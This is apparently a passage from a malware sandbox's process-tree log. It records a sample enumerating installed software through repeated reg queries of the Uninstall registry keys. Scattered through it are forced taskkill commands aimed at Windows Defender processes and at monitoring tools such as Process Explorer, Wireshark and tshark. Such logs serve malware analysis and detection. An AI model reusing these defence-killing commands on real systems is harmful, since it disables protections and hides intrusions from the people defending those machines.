C:\Windows\system32\cmd.execmd.exe2⤵PID:2008
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1856
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:268
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:472
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:996
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:1948
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:872
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:1504
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:332
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1404
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1116
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1752
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1416
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:1780
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:1496
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1692
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1016
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:1360
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:2044
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1020
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:316
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:664
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1640
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1996
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1504
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1368
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:1772
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:868
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1988
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:620
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1552
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1540
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1264
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:1456
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1312
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1580
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:1632
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:1360
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1564
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:1464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:472
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1856
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:1948
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:1684
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1140
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:1396
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:1820
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1772
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:1632
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1848
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1932
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:1464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:1764
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2004
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:1472
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1480
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:2024
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:1996
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1396
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:868
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:1552
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1920
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:2044
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:1556
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1624
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1760
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:820
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:1848
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1628
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:1520
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1484
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:1664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:1392
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1164
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:1748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:1568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1504
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:1976
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:1768
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:868
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:2036
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:1828
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1368
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:564
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1616
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1188
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:1856
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:872
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1640
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:2040
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:1416
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1360
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:2016
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:1556
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1764
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:316
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:1868
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1624
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:560
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1028
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:1992
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:1748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:856
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:620
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1768
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:1612
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1988
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:800
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:564
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2020
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1224
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:1016
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1852
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:1416
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:2044
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1496
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1464
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:1576
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1780
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:1848
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:1312
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1944
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1392
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:1568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1748
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:1756
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:2036
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1612
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:564
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1856
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:584
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:1416
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:1572
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1904
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:1624
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1848
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:1028
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1996
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1568
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1508
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:1768
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:800
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:1224
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2044
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:1416
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:1684
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:820
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:2016
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:1480
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1116
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:1632
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1992
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1028
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1552
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:1580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:432
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1804
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1224
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:1320
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1576
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1884
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:2016
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:664
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:332
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:1992
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:1756
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:392
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:824
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:432
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1572
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:1948
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:1576
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1856
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:1312
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:1564
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1992
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:432
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:1480
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1772
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2024
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:1564
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:1932
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1748
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:1616
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:1944
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1020
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:1028
-
-
